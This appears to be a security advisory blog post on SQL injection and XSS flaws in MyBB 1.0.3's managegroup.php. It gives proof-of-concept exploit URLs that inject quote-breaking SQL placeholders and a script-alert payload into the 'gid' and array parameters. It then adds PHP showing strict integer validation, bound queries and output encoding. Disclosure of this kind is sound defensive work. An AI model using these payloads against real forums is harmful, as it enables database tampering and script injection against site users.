
imei Addmimistrator’s BugBlog

imei’s security Advisories and researches

——————-Summary—————-
Software: MyBB
Software’s Web Site: http://www.mybboard.com
Versions: 1.0.3
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Available
Discovered by: imei addmimistrator
Risk Level: medium high
—————–Description—————
There is a security bug in MyBB 1.0.3 (latest version, fully patched), in the file managegroup.php, lines 313, that allows an attacker to perform SQL injection and XSS attacks. The bug is the result of poor checking for non-integer values of the “gid” input variable.
Conditions: the user must have sufficient permissions (group leader)
/////////////////////////
Lines of buggy code are:
75 sql
98 sql
125 sql
141 sql
160 sql
177 xss
/////////////////////////
————–Exploit———————-
mybb/managegroup.php?gid=8&action=do_joinrequests&request[sql]=accept
mybb/managegroup.php?gid=8′sql&action=joinrequests
mybb/managegroup.php?gid=8′sql&action=do_manageusers&removeuser[]=’sql
mybb/managegroup.php?gid=8′sql{if the user group is publicly joinable with moderation by the leader}
mybb/managegroup.php?gid=8′sql{if the user group is publicly joinable without moderation by the leader}
mybb/managegroup.php?gid=8′//<script>alert(1)</script>{if the user group is publicly joinable without moderation by the leader, and there are too many requests to show on one page}
————–Solution———————
Upgrade to the vendor-provided patch.
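The root cause described above (non-integer values accepted for gid, and likewise for the request[] keys and removeuser[] values) is closed by strict integer validation, bound query parameters and output encoding. The PHP below is an added example, not MyBB code and not the vendor patch; the helper names and the table schema are hypothetical.

```php
<?php
// Added illustration, not MyBB code. Helper, table and column names are hypothetical.

// Return the value as an int only if it is a plain decimal integer >= 0.
function strict_id($value): ?int
{
    if (!is_int($value) && !is_string($value)) {
        return null;                       // e.g. gid[]=1 arrives as an array
    }
    $id = filter_var($value, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    return $id === false ? null : $id;
}

// Validate an array parameter. With $useKeys the ids are in the keys
// (request[<id>]=accept); otherwise they are in the values (removeuser[]=<id>).
function strict_id_list($param, bool $useKeys): ?array
{
    if (!is_array($param)) {
        return null;
    }
    $ids = [];
    foreach ($useKeys ? array_keys($param) : $param as $raw) {
        if (($id = strict_id($raw)) === null) {
            return null;                   // one bad element rejects the whole request
        }
        $ids[] = $id;
    }
    return $ids;
}

// Constructed request data modelled on the parameters named in the advisory.
// None of the three passes validation, so the handler should stop before any query.
$get = ['gid' => "8'sql", 'request' => ['sql' => 'accept'], 'removeuser' => ["'sql"]];
var_dump(strict_id($get['gid']));
var_dump(strict_id_list($get['request'], true));
var_dump(strict_id_list($get['removeuser'], false));

// A well-formed request passes, and the ids are still bound, never concatenated.
$gid = strict_id('8');
$uids = strict_id_list(['12', '15'], false);
$marks = implode(',', array_fill(0, count($uids), '?'));
$sql = "DELETE FROM group_members WHERE gid = ? AND uid IN ($marks)"; // hypothetical schema
$params = array_merge([$gid], $uids);  // hand to PDOStatement::execute($params)

// Output side (the XSS case): encode anything echoed back into HTML.
echo htmlspecialchars('gid=' . $get['gid'], ENT_QUOTES, 'UTF-8'), "\n";
```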
————–Credit———————–
Discovered by: imei addmimistrator
addmimistrator(4}gmail(O}com
www.myimei.com
security.myimei.com

One Response to “MyBB1.0.3~managegroup.php~Multiple SqlInjection & XSS”
